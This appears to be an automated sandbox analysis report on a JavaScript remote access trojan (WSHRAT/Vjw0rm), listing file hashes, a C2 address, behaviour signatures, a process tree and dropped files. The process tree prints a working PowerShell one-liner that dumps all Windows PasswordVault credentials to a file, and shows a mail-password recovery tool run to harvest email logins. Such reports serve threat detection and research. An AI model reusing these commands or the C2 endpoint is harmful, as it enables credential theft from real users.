Analysis

  • max time kernel
    71s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64 arch:x86 image:win10v2004-20220812-en locale:en-us os:windows10-2004-x64 system
  • submitted
    01-11-2022 08:16

General

  • Target

    FCR22001306.js

  • Size

    268KB

  • MD5

    d873c25379f94f8a1803f4c968befaf6

  • SHA1

    13293c020e2eec88e5627a44ec8eafa3b0d0f6ab

  • SHA256

    da581bea8917ae4b052e9978b8264b3257e06d80b2973c29e80cdf216a8640c4

  • SHA512

    d3ee46a7e61496230bb65082b5c07c4641c965ed523471d548bd1694e7df0f8d6c5c851f99dba5a981454224cdeac4ba0f1ed30266d8235d11e111db983be062

  • SSDEEP

    3072:xGFYHhbq8fCQFiem5yBmExNr2sBB1fbNQnTXFEZhRZfUQ0jShn8nc2KVHybnuRAL:sF8fCQHWsBBJpYEPfM3jY2+4CAU9i

Malware Config

Extracted

Family

wshrat

C2

http://egodds.longmusic.com:2084

Signatures

  • Vjw0rm

    Vjw0rm is a remote access trojan written in JavaScript.

  • WSHRAT

    WSHRAT is a variant of the Houdini worm and exists in both VBS and JS variants.

  • NirSoft MailPassView 2 IoCs

    Password recovery tool for various email clients

  • Nirsoft 2 IoCs
  • Blocklisted process makes network request 9 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 4 IoCs
  • Adds Run key to start application 2 TTPs 4 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Kills process with taskkill 2 IoCs
  • Script User-Agent 4 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious use of WriteProcessMemory 2 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\FCR22001306.js
    1⤵
    • Blocklisted process makes network request
    • Checks computer location settings
    • Drops startup file
    • Adds Run key to start application
    • Suspicious use of WriteProcessMemory
    PID:1128
    • C:\Windows\System32\wscript.exe
      "C:\Windows\System32\wscript.exe" //B "C:\Users\Admin\AppData\Roaming\lzwNNcWAsq.js"
      2⤵
      • Blocklisted process makes network request
      • Drops startup file
      PID:4380
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -command [void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime] $vault = New-Object Windows.Security.Credentials.PasswordVault $vault.RetrieveAll() | % { $_.RetrievePassword();$_ } > "C:\Users\Admin\AppData\Local\Temp\tmp.txt"
      2⤵
      PID:2336
    • C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c taskkill /F /IM cmdc.exe
      2⤵
      PID:3196
      • C:\Windows\system32\taskkill.exe
        taskkill /F /IM cmdc.exe
        3⤵
        • Kills process with taskkill
        PID:4952
    • C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c taskkill /F /IM cmdc.exe
      2⤵
      PID:732
    • C:\Users\Admin\AppData\Local\Temp\cmdc.exe
      "C:\Users\Admin\AppData\Local\Temp\cmdc.exe" /stext C:\Users\Admin\AppData\Local\Temp\cmdc.exedata
      2⤵
      PID:4024
    • C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c mkdir "C:\Users\Admin\AppData\Local\Temp\wshlogs"
      2⤵
      PID:3236
  • C:\Windows\system32\taskkill.exe
    taskkill /F /IM cmdc.exe
    1⤵
    • Kills process with taskkill
    PID:1680

Network

MITRE ATT&CK Enterprise v6

Downloads

  • C:\Users\Admin\AppData\Local\Temp\cmdc.cfg

    Filesize

    373B

    MD5

    70e69155b8080b5db35191ab8426d084

    SHA1

    383deaaee90ce71b28b0a6e22124e77aa1cccf8b

    SHA256

    104e0212403148a018258ef005a64ec73f0a148dbee230cb5c91dd691d03aefe

    SHA512

    c718c69454e4d9bcac24c918bf4c7f05ab93910b8a4701bd1dc914a9ca13dffe5f083f30881b5796d239c11be2f8b3e38a7e2ac7dcabc3d9810f59d9228bf342

  • C:\Users\Admin\AppData\Local\Temp\cmdc.exe

    Filesize

    100KB

    MD5

    54e8ded7b148a13d3363ac7b33f6eb06

    SHA1

    63dcbe2db9cc14564eb84d5e953f2f9f5c54acd9

    SHA256

    400b411a9bffd687c5e74f51d43b7dc92cdb8d5ca9f674456b75a5d37587d342

    SHA512

    bf6d047bb55150b2369bdd7dfea9c815894af2e05e5b45f2eedf67d5d6a9569189ee495870fddf334a173a4beed62d2a08807c000d4c47339ac76b760b4ae349

  • C:\Users\Admin\AppData\Local\Temp\tmp.txt

    Filesize

    1KB

    MD5

    c416c12d1b2b1da8c8655e393b544362

    SHA1

    fb1a43cd8e1c556c2d25f361f42a21293c29e447

    SHA256

    0600d59103840dff210778179fdfba904dcb737a4bfdb35384608698c86ea046

    SHA512

    cb6d3636be4330aa2fd577c3636d0b7165f92ee817e98f21180ba0c918eb76f4e38f025086593a0e508234ca981cfec2c53482b0e9cc0acfa885fefbdf89913c

  • C:\Users\Admin\AppData\Roaming\lzwNNcWAsq.js

    Filesize

    10KB

    MD5

    18aa18aca1d624556d87fd1c3c8dfc4a

    SHA1

    45509a074cd5f5d11d507a7fe0bcb733f874e90d

    SHA256

    27765e27d897d45fb5cc093197a65545ed4a120130e12cc88e70f41e68788036

    SHA512

    80e7fcc1551290772a960b76445999f85f5cbef24cf2b860c7d8e0e7ea1a2a284e8b120a203947c2e8f2cdff13193095c00922e6f7e7cc94069e8846bad4554a

  • memory/2336-138-0x000002147CB80000-0x000002147CB88000-memory.dmp

    Filesize

    32KB

  • memory/2336-139-0x00007FFAD8B90000-0x00007FFAD9651000-memory.dmp

    Filesize

    10.8MB

  • memory/2336-137-0x00007FFAD8B90000-0x00007FFAD9651000-memory.dmp

    Filesize

    10.8MB

  • memory/2336-136-0x000002147B250000-0x000002147B25A000-memory.dmp

    Filesize

    40KB

  • memory/2336-135-0x000002147B220000-0x000002147B242000-memory.dmp

    Filesize

    136KB